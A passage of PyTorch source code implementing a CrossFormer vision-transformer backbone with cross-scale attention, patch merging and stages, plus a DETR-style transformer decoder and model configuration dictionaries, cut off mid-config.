Gh*Gw\n relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Gh*Gw, Gh*Gw, 2\n relative_coords[:, :, 0] += group_size[0] - 1 # shift to start from 0\n relative_coords[:, :, 1] += group_size[1] - 1\n relative_coords[:, :, 0] *= 2 * group_size[1] - 1\n relative_position_index = relative_coords.sum(-1) # Gh*Gw, Gh*Gw\n\n pos = self.pos(biases) # 2Gh-1 * 2Gw-1, heads\n # select position bias\n relative_position_bias = pos[relative_position_index.view(-1)].view( \n group_size[0] * group_size[1], group_size[0] * group_size[1], -1) # Gh*Gw,Gh*Gw,nH\n relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Gh*Gw, Gh*Gw\n attn = attn + relative_position_bias.unsqueeze(0)\n\n if mask is not None:\n nG = mask.shape[0]\n attn = attn.view(B_ // nG, nG, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) # (B, nG, nHead, N, N)\n attn = attn.view(-1, self.num_heads, N, N)\n attn = self.softmax(attn)\n else:\n attn = self.softmax(attn)\n\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B_, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n def extra_repr(self) -> str:\n return f'dim={self.dim}, num_heads={self.num_heads}'\n\n def flops(self, N):\n # calculate flops for 1 window with token length of N\n flops = 0\n excluded_flops = 0\n # qkv = self.qkv(x)\n flops += N * self.dim * 3 * self.dim\n # attn = (q @ k.transpose(-2, -1))\n flops += self.num_heads * N * (self.dim // self.num_heads) * N\n excluded_flops += self.num_heads * N * (self.dim // self.num_heads) * N\n # x = (attn @ v)\n flops += self.num_heads * N * N * (self.dim // self.num_heads)\n excluded_flops += self.num_heads * N * N * (self.dim // self.num_heads)\n # x = self.proj(x)\n flops += N * self.dim * self.dim\n if self.position_bias:\n flops += self.pos.flops(N)\n return flops, excluded_flops\n\nclass CrossFormerBlock(nn.Module):\n r\"\"\" CrossFormer Block.\n Args:\n dim (int): Number of input channels.\n input_resolution (tuple[int]): Input resulotion.\n num_heads (int): Number of attention heads.\n group_size (int): Window size.\n lsda_flag (int): use SDA or LDA, 0 for SDA and 1 for LDA.\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set.\n drop (float, optional): Dropout rate. Default: 0.0\n attn_drop (float, optional): Attention dropout rate. Default: 0.0\n drop_path (float, optional): Stochastic depth rate. Default: 0.0\n act_layer (nn.Module, optional): Activation layer. Default: nn.GELU\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n \"\"\"\n\n def __init__(self, dim, input_resolution, num_heads, group_size=7, interval=8, lsda_flag=0,\n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., drop_path=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm, num_patch_size=1):\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.num_heads = num_heads\n self.group_size = group_size\n self.interval = interval\n self.lsda_flag = lsda_flag\n self.mlp_ratio = mlp_ratio\n self.num_patch_size = num_patch_size\n\n self.norm1 = norm_layer(dim)\n\n self.attn = Attention(\n dim, num_heads=num_heads,\n qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop,\n position_bias=True)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x, H, W):\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size %d, %d, %d\" % (L, H, W)\n\n if min(H, W) <= self.group_size:\n # if window size is larger than input resolution, we don't partition windows\n self.lsda_flag = 0\n self.group_size = min(H, W)\n\n shortcut = x\n x = self.norm1(x)\n x = x.view(B, H, W, C)\n\n # padding\n size_div = self.interval if self.lsda_flag == 1 else self.group_size\n pad_l = pad_t = 0\n pad_r = (size_div - W % size_div) % size_div\n pad_b = (size_div - H % size_div) % size_div\n x = F.pad(x, (0, 0, pad_l, pad_r, pad_t, pad_b))\n _, Hp, Wp, _ = x.shape\n\n mask = torch.zeros((1, Hp, Wp, 1), device=x.device)\n if pad_b > 0:\n mask[:, -pad_b:, :, :] = -1\n if pad_r > 0:\n mask[:, :, -pad_r:, :] = -1\n\n # group embeddings and generate attn_mask\n if self.lsda_flag == 0: # SDA\n G = Gh = Gw = self.group_size\n x = x.reshape(B, Hp // G, G, Wp // G, G, C).permute(0, 1, 3, 2, 4, 5).contiguous()\n x = x.reshape(B * Hp * Wp // G**2, G**2, C)\n nG = Hp * Wp // G**2\n # attn_mask\n if pad_r > 0 or pad_b > 0:\n mask = mask.reshape(1, Hp // G, G, Wp // G, G, 1).permute(0, 1, 3, 2, 4, 5).contiguous()\n mask = mask.reshape(nG, 1, G * G)\n attn_mask = torch.zeros((nG, G * G, G * G), device=x.device)\n attn_mask = attn_mask.masked_fill(mask < 0, NEG_INF)\n else:\n attn_mask = None\n else: # LDA\n I, Gh, Gw = self.interval, Hp // self.interval, Wp // self.interval\n x = x.reshape(B, Gh, I, Gw, I, C).permute(0, 2, 4, 1, 3, 5).contiguous()\n x = x.reshape(B * I * I, Gh * Gw, C)\n nG = I ** 2\n # attn_mask\n if pad_r > 0 or pad_b > 0:\n mask = mask.reshape(1, Gh, I, Gw, I, 1).permute(0, 2, 4, 1, 3, 5).contiguous()\n mask = mask.reshape(nG, 1, Gh * Gw)\n attn_mask = torch.zeros((nG, Gh * Gw, Gh * Gw), device=x.device)\n attn_mask = attn_mask.masked_fill(mask < 0, NEG_INF)\n else:\n attn_mask = None\n\n # multi-head self-attention\n x = self.attn(x, Gh, Gw, mask=attn_mask) # nG*B, G*G, C\n \n # ungroup embeddings\n if self.lsda_flag == 0:\n x = x.reshape(B, Hp // G, Wp // G, G, G, C).permute(0, 1, 3, 2, 4, 5).contiguous() # B, Hp//G, G, Wp//G, G, C\n else:\n x = x.reshape(B, I, I, Gh, Gw, C).permute(0, 3, 1, 4, 2, 5).contiguous() # B, Gh, I, Gw, I, C\n x = x.reshape(B, Hp, Wp, C)\n\n # remove padding\n if pad_r > 0 or pad_b > 0:\n x = x[:, :H, :W, :].contiguous()\n x = x.view(B, H * W, C)\n\n # FFN\n x = shortcut + self.drop_path(x)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, input_resolution={self.input_resolution}, num_heads={self.num_heads}, \" \\\n f\"group_size={self.group_size}, lsda_flag={self.lsda_flag}, mlp_ratio={self.mlp_ratio}\"\n\n def flops(self):\n flops = 0\n H, W = self.input_resolution\n # norm1\n flops += self.dim * H * W\n # Attention\n size_div = self.interval if self.lsda_flag == 1 else self.group_size\n Hp = math.ceil(H / size_div) * size_div\n Wp = math.ceil(W / size_div) * size_div\n Gh = Hp / size_div if self.lsda_flag == 1 else self.group_size\n Gw = Wp / size_div if self.lsda_flag == 1 else self.group_size\n nG = Hp * Wp / Gh / Gw\n attn_flops, attn_excluded_flops = self.attn.flops(Gh * Gw)\n flops += nG * attn_flops\n excluded_flops = nG * attn_excluded_flops\n # mlp\n flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio\n # norm2\n flops += self.dim * H * W\n return flops, excluded_flops\n\nclass PatchMerging(nn.Module):\n r\"\"\" Patch Merging Layer.\n Args:\n input_resolution (tuple[int]): Resolution of input feature.\n dim (int): Number of input channels.\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n \"\"\"\n\n def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm, patch_size=[2], num_input_patch_size=1):\n super().__init__()\n self.input_resolution = input_resolution\n self.dim = dim\n self.reductions = nn.ModuleList()\n self.patch_size = patch_size\n self.norm = norm_layer(dim)\n\n for i, ps in enumerate(patch_size):\n if i == len(patch_size) - 1:\n out_dim = 2 * dim // 2 ** i\n else:\n out_dim = 2 * dim // 2 ** (i + 1)\n stride = 2\n padding = (ps - stride) // 2\n self.reductions.append(nn.Conv2d(dim, out_dim, kernel_size=ps, \n stride=stride, padding=padding))\n\n def forward(self, x, H, W):\n \"\"\"\n x: B, H*W, C\n \"\"\"\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size\"\n assert H % 2 == 0 and W % 2 == 0, f\"x size ({H}*{W}) are not even.\"\n\n x = self.norm(x)\n x = x.view(B, H, W, C).permute(0, 3, 1, 2).contiguous()\n\n xs = []\n for i in range(len(self.reductions)):\n tmp_x = self.reductions[i](x).flatten(2).transpose(1, 2).contiguous()\n xs.append(tmp_x)\n x = torch.cat(xs, dim=2)\n return x\n\n def extra_repr(self) -> str:\n return f\"input_resolution={self.input_resolution}, dim={self.dim}\"\n\n def flops(self):\n H, W = self.input_resolution\n flops = H * W * self.dim\n for i, ps in enumerate(self.patch_size):\n if i == len(self.patch_size) - 1:\n out_dim = 2 * self.dim // 2 ** i\n else:\n out_dim = 2 * self.dim // 2 ** (i + 1)\n flops += (H // 2) * (W // 2) * ps * ps * out_dim * self.dim\n return flops\n\nclass Stage(nn.Module):\n \"\"\" CrossFormer blocks for one stage.\n Args:\n dim (int): Number of input channels.\n input_resolution (tuple[int]): Input resolution.\n depth (int): Number of blocks.\n num_heads (int): Number of attention heads.\n group_size (int): Group size.\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.\n qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set.\n drop (float, optional): Dropout rate. Default: 0.0\n attn_drop (float, optional): Attention dropout rate. Default: 0.0\n drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0\n norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm\n downsample (nn.Module | None, optional): Downsample layer at the end of the layer. Default: None\n use_checkpoint (bool): Ghether to use checkpointing to save memory. Default: False.\n \"\"\"\n\n def __init__(self, dim, input_resolution, depth, num_heads, group_size, interval,\n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0.,\n drop_path=0., norm_layer=nn.LayerNorm, downsample=None, use_checkpoint=False,\n patch_size_end=[4], num_patch_size=None):\n\n super().__init__()\n self.dim = dim\n self.depth = depth\n self.use_checkpoint = use_checkpoint\n\n # build blocks\n self.blocks = nn.ModuleList()\n for i in range(depth):\n lsda_flag = 0 if (i % 2 == 0) else 1\n self.blocks.append(CrossFormerBlock(dim=dim, input_resolution=input_resolution,\n num_heads=num_heads, group_size=group_size, interval=interval,\n lsda_flag=lsda_flag,\n mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop=drop, attn_drop=attn_drop,\n drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path,\n norm_layer=norm_layer,\n num_patch_size=num_patch_size))\n\n # patch merging layer\n if downsample is not None:\n self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer, \n patch_size=patch_size_end, num_input_patch_size=num_patch_size)\n else:\n self.downsample = None\n\n def forward(self, x, H, W):\n for blk in self.blocks:\n if self.use_checkpoint:\n x = checkpoint.checkpoint(blk, x)\n else:\n x = blk(x, H, W)\n\n B, _, C = x.shape\n feat = x.view(B, H, W, C).permute(0, 3, 1, 2).contiguous()\n if self.downsample is not None:\n x = self.downsample(x, H, W)\n return feat, x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, depth={self.depth}\"\n\n def flops(self):\n flops = 0\n excluded_flops = 0\n for blk in self.blocks:\n blk_flops, blk_excluded_flops = blk.flops()\n flops += blk_flops\n excluded_flops += blk_excluded_flops\n if self.downsample is not None:\n flops += self.downsample.flops()\n return flops, excluded_flops\n\nclass PatchEmbed(nn.Module):\n r\"\"\" Image to Patch Embedding\n Args:\n img_size (int): Image size. Default: 224.\n patch_size (int): Patch token size. Default: 4.\n in_chans (int): Number of input image channels. Default: 3.\n embed_dim (int): Number of linear projection output channels. Default: 96.\n norm_layer (nn.Module, optional): Normalization layer. Default: None\n \"\"\"\n\n def __init__(self, img_size=224, patch_size=[4], in_chans=3, embed_dim=96, norm_layer=None):\n super().__init__()\n img_size = to_2tuple(img_size)\n # patch_size = to_2tuple(patch_size)\n patches_resolution = [img_size[0] // 4, img_size[1] // 4] # only for flops calculation\n self.img_size = img_size\n self.patch_size = patch_size\n self.patches_resolution = patches_resolution\n\n self.in_chans = in_chans\n self.embed_dim = embed_dim\n\n self.projs = nn.ModuleList()\n for i, ps in enumerate(patch_size):\n if i == len(patch_size) - 1:\n dim = embed_dim // 2 ** i\n else:\n dim = embed_dim // 2 ** (i + 1)\n stride = 4\n padding = (ps - 4) // 2\n self.projs.append(nn.Conv2d(in_chans, dim, kernel_size=ps, stride=stride, padding=padding))\n if norm_layer is not None:\n self.norm = norm_layer(embed_dim)\n else:\n self.norm = None\n\n def forward(self, x):\n B, C, H, W = x.shape\n xs = []\n for i in range(len(self.projs)):\n tx = self.projs[i](x).flatten(2).transpose(1, 2)\n xs.append(tx) # B Ph*Pw C\n x = torch.cat(xs, dim=2)\n if self.norm is not None:\n x = self.norm(x)\n return x, H, W\n\n def flops(self):\n Ho, Wo = self.patches_resolution\n flops = 0\n for i, ps in enumerate(self.patch_size):\n if i == len(self.patch_size) - 1:\n dim = self.embed_dim // 2 ** i\n else:\n dim = self.embed_dim // 2 ** (i + 1)\n flops += Ho * Wo * dim * self.in_chans * (self.patch_size[i] * self.patch_size[i])\n if self.norm is not None:\n flops += Ho * Wo * self.embed_dim\n return flops\n\nclass CrossFormer(nn.Module):\n r\"\"\" CrossFormer\n A PyTorch impl of : `CrossFormer: A Versatile Vision Transformer Based on Cross-scale Attention` -\n Args:\n img_size (int | tuple(int)): Input image size. Default 224\n patch_size (int | tuple(int)): Patch size. Default: 4\n in_chans (int): Number of input image channels. Default: 3\n num_classes (int): Number of classes for classification head. Default: 1000\n embed_dim (int): Patch embedding dimension. Default: 96\n depths (tuple(int)): Depth of each stage.\n num_heads (tuple(int)): Number of attention heads in different layers.\n group_size (int): Group size. Default: 7\n mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4\n qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True\n qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None\n drop_rate (float): Dropout rate. Default: 0\n attn_drop_rate (float): Attention dropout rate. Default: 0\n drop_path_rate (float): Stochastic depth rate. Default: 0.1\n norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.\n ape (bool): If True, add absolute position embedding to the patch embedding. Default: False\n patch_norm (bool): If True, add normalization after patch embedding. Default: True\n use_checkpoint (bool): Ghether to use checkpointing to save memory. Default: False\n \"\"\"\n def __init__(self, \n img_size=224, \n patch_size=[4], \n in_chans=3, \n num_classes=1000,\n embed_dim=96, \n depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24],\n group_size=[7, 7, 7, 7], \n crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., \n qkv_bias=True, \n qk_scale=None,\n drop_rate=0., \n attn_drop_rate=0., \n drop_path_rate=0.1,\n norm_layer=nn.LayerNorm, \n patch_norm=True,\n use_checkpoint=False, \n merge_size=[[2], [2], [2]],\n pretrained = None, \n **kwargs):\n super().__init__()\n\n self.num_classes = num_classes\n self.num_layers = len(depths)\n self.embed_dim = embed_dim\n self.patch_norm = patch_norm\n self.num_features = int(embed_dim * 2 ** (self.num_layers - 1))\n self.mlp_ratio = mlp_ratio\n\n # split image into non-overlapping patches\n self.patch_embed = PatchEmbed(\n img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim,\n norm_layer=norm_layer if self.patch_norm else None)\n patches_resolution = self.patch_embed.patches_resolution\n self.patches_resolution = patches_resolution # [H//4, W//4] of original image size\n self.pos_drop = nn.Dropout(p=drop_rate)\n # self.neck = FPN(\n # in_channels = [96,192,384,768],\n # out_channels=256,\n # start_level=1,\n # add_extra_convs='on_input',\n # num_outs=5\n # )\n # stochastic depth\n dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule\n\n # build layers\n self.layers = nn.ModuleList()\n\n num_patch_sizes = [len(patch_size)] + [len(m) for m in merge_size]\n for i_layer in range(self.num_layers):\n patch_size_end = merge_size[i_layer] if i_layer < self.num_layers - 1 else None\n num_patch_size = num_patch_sizes[i_layer]\n layer = Stage(dim=int(embed_dim * 2 ** i_layer),\n input_resolution=(patches_resolution[0] // (2 ** i_layer),\n patches_resolution[1] // (2 ** i_layer)),\n depth=depths[i_layer],\n num_heads=num_heads[i_layer],\n group_size=group_size[i_layer],\n interval=crs_interval[i_layer],\n mlp_ratio=self.mlp_ratio,\n qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop=drop_rate, attn_drop=attn_drop_rate,\n drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])],\n norm_layer=norm_layer,\n downsample=PatchMerging if (i_layer < self.num_layers - 1) else None,\n use_checkpoint=use_checkpoint,\n patch_size_end=patch_size_end,\n num_patch_size=num_patch_size)\n self.layers.append(layer)\n # classification\n # self.norm = norm_layer(self.num_features)\n # self.avgpool = nn.AdaptiveAvgPool1d(1)\n # self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity()\n\n self.apply(self._init_weights)\n self.init_weights(pretrained) \n\n def init_weights(self, pretrained=None):\n \"\"\"Initialize the weights in backbone.\n Args:\n pretrained (str, optional): Path to pre-trained weights.\n Defaults to None.\n # Note that `mmcv` has a safe checkpoint_load impl, please refer to the following url\n # load_checkpoint(self, pretrained, map_location='cpu', strict=False, logger=logger) \n # https://github.com/open-mmlab/mmcv/blob/571e3e5fc75c23b45cbd9b00011af094357c5f1d/mmcv/runner/checkpoint.py \n \"\"\"\n def _process_mmcls_checkpoint(checkpoint):\n state_dict = checkpoint['state_dict']\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n if k.startswith('backbone.'):\n new_state_dict[k[9:]] = v\n new_checkpoint = dict(state_dict=new_state_dict)\n return new_checkpoint\n\n if isinstance(pretrained, str):\n # self.apply(self._init_weights)\n checkpoint = torch.load(pretrained, map_location='cpu')\n new_checkpoint = _process_mmcls_checkpoint(checkpoint)\n '''\n # ************************************************************************* Detailed code for loading checkpoint ********************************************************************************\n # Missing Keys: ['patch_embed1.proj.weight', 'patch_embed1.proj.bias', 'patch_embed1.norm.weight', 'patch_embed1.norm.bias', 'block1.0.norm1.weight', 'block1.0.norm1.bias', 'block1.0.attn.q.wei\n # ght', 'block1.0.attn.q.bias', 'block1.0.attn.kv.weight', 'block1.0.attn.kv.bias', 'block1.0.attn.proj.weight', 'block1.0.attn.proj.bias', 'block1.0.attn.sr.weight', 'block1.0.attn.sr.bias', '\n # block1.0.attn.norm.weight', 'block1.0.attn.norm.bias', 'block1.0.norm2.weight', \n # Unexpected Keys: ['backbone.patch_embed1.proj.weight', 'backbone.patch_embed1.proj.bias', 'backbone.patch_embed1.norm.weight', 'backbone.patch_embed1.norm.bias', 'backbone.block1.0.norm1.weig\n # ht', 'backbone.block1.0.norm1.bias', 'backbone.block1.0.attn.q.weight', 'backbone.block1.0.attn.q.bias', 'backbone.block1.0.attn.kv.weight', 'backbone.block1.0.attn.kv.bias', 'backbone.block1\n # .0.attn.proj.weight', 'backbone.block1.0.attn.proj.bias', 'backbone.block1.0.attn.sr.weight', 'backbone.block1.0.attn.sr.bias', 'backbone.block1.0.attn.norm.weight', 'backbone.block1.0.attn.n\n # orm.bias', 'backbone.block1.0.norm2.weight',\n '''\n # pretrain_dict = new_checkpoint['state_dict']\n # my_model_dict = self.state_dict()\n # pretrain_dict = {k: v for k, v in pretrain_dict.items() if k in my_model_dict}\n # my_model_dict.update(pretrain_dict)\n # self.load_state_dict(my_model_dict)\n # print(f'load from {pretrained}.')\n logger.info(f\"Loading pretrained model from {pretrained}\")\n missing_keys, unexpected_keys = self.load_state_dict(new_checkpoint['state_dict'], strict=False)\n unexpected_keys = [k for k in unexpected_keys if not (k.endswith('total_params') or k.endswith('total_ops'))]\n if len(missing_keys) > 0:\n logger.info('Missing Keys: {}'.format(missing_keys))\n if len(unexpected_keys) > 0:\n logger.info('Unexpected Keys: {}'.format(unexpected_keys))\n elif pretrained is None:\n self.apply(self._init_weights)\n else:\n raise TypeError('pretrained must be a str or None')\n\n def _init_weights(self, m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'absolute_pos_embed'}\n\n @torch.jit.ignore\n def no_weight_decay_keywords(self):\n return {'relative_position_bias_table'}\n\n def forward(self, x):\n x, H, W = self.patch_embed(x)\n x = self.pos_drop(x)\n outs = []\n for i, layer in enumerate(self.layers):\n feat, x = layer(x, H //4 //(2 ** i), W //4 //(2 ** i))\n outs.append(feat)\n # # classification\n # x = self.norm(x) # B L C\n # x = self.avgpool(x.transpose(1, 2)) # B C 1\n # x = torch.flatten(x, 1)\n # x = self.head(x)\n # return x \n # FPN Neck\n output = outs[-1]\n output = output.flatten(2).transpose(1, 2)\n # torch.Size([3, 1000, 768]) \n output = output.permute(1,0,2)\n # torch.Size([1000, 3, 768])\n # outputs = self.neck(outs)\n # src_flatten = []\n # for src in outputs:\n # src = src.flatten(2).transpose(1, 2)\n # src_flatten.append(src)\n # src_flatten = torch.cat(src_flatten, 1)\n # src_flatten = src_flatten.permute(1,0,2)\n return output\n\n def flops(self):\n flops = 0\n excluded_flops = 0\n flops += self.patch_embed.flops()\n for i, layer in enumerate(self.layers):\n layer_flops, layer_excluded_flops = layer.flops()\n flops += layer_flops\n excluded_flops += layer_excluded_flops\n # flops += self.num_features * self.patches_resolution[0] * self.patches_resolution[1] // (2 ** self.num_layers)\n # flops += self.num_features * self.num_classes\n return flops, excluded_flops\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n\nclass TransformerDecoder(nn.Module):\n def __init__(self, decoder_layer, num_layers, norm=None, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n\n intermediate = []\n\n for layer in self.layers:\n output = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos)\n if self.return_intermediate:\n intermediate.append(self.norm(output))\n\n if self.norm is not None:\n output = self.norm(output)\n if self.return_intermediate:\n intermediate.pop()\n intermediate.append(output)\n\n if self.return_intermediate:\n return torch.stack(intermediate)\n \n return output.unsqueeze(0)\n\nclass TransformerDecoderLayer(nn.Module):\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,\n activation=\"relu\", normalize_before=False):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = nn.MultiheadAttention(\n d_model, nhead, dropout=dropout)\n # Implementation of feedforward mode\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n self.normalize_before = normalize_before\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2 = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)[0]\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n \"\"\"\n - query: :math:`(L, N, E)` where L is the target sequence length, N is the batch size, E is\n the embedding dimension.\n \n - key: :math:`(S, N, E)`, where S is the source sequence length, N is the batch size, E is\n the embedding dimension.\n \n - value: :math:`(S, N, E)` where S is the source sequence length, N is the batch size, E is\n the embedding dimension.\n \n - key_padding_mask: :math:`(N, S)`, ByteTensor, where N is the batch size, S is the source sequence length.\n \n - attn_mask: 2D mask :math:`(L, S)` where L is the target sequence length, S is the source sequence length.\n 3D mask :math:`(N*num_heads, L, S)` where N is the batch size, L is the target sequence length,\n S is the source sequence length. \n \"\"\" \n tgt2 = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)[0]\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward_pre(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n tgt2 = self.norm1(tgt)\n q = k = self.with_pos_embed(tgt2, query_pos)\n tgt2 = self.self_attn(q, k, value=tgt2, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)[0]\n tgt = tgt + self.dropout1(tgt2)\n tgt2 = self.norm2(tgt)\n tgt2 = self.multihead_attn(query=self.with_pos_embed(tgt2, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)[0]\n tgt = tgt + self.dropout2(tgt2)\n tgt2 = self.norm3(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt2))))\n tgt = tgt + self.dropout3(tgt2)\n return tgt\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n if self.normalize_before:\n return self.forward_pre(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n\nclass Transformer(nn.Module):\n def __init__(self,\n e_cfgs,\n d_model=512, \n d_nhead=8, \n num_decoder_layers=6, \n dim_feedforward=2048, \n dropout=0.1,\n activation=\"relu\", \n normalize_before=False,\n return_intermediate_dec=False):\n super().__init__()\n self.encoder = CrossFormer(**e_cfgs)\n decoder_layer = TransformerDecoderLayer(d_model, d_nhead, dim_feedforward,\n dropout, activation, normalize_before)\n decoder_norm = nn.LayerNorm(d_model)\n self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm,\n return_intermediate=return_intermediate_dec)\n self._reset_parameters()\n self.d_model = d_model\n self.nhead = d_nhead\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, mask, query_embed):\n # flatten NxCxHxW to HWxNxC\n bs, c, h, w = src.shape\n # src = src.flatten(2).permute(2, 0, 1)\n # pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n query_embed = query_embed.unsqueeze(1).repeat(1, bs, 1)\n mask = mask.flatten(1)\n memory = self.encoder(src)\n tgt = torch.zeros_like(query_embed)\n hs = self.decoder(tgt, memory, memory_key_padding_mask=None, query_pos=query_embed)\n # return hs.transpose(1, 2), memory.permute(1, 2, 0).view(bs, c, h, w)\n # torch.Size([6, 400, 3, 768])\n return hs.transpose(1, 2)\n\n# model configs\nconfigs = {\n 'retinanet_crossformer_s_fpn_1x_coco':\n # [96,192,384,768]\n dict(img_size = [864,1152], patch_size=[4, 8, 16, 32],in_chans=3, embed_dim=96, depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24], group_size=[7,7,7,7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained = None\n ),\n 'retinanet_crossformer_b_fpn_1x_coco':\n # [96,192,384,768], \n 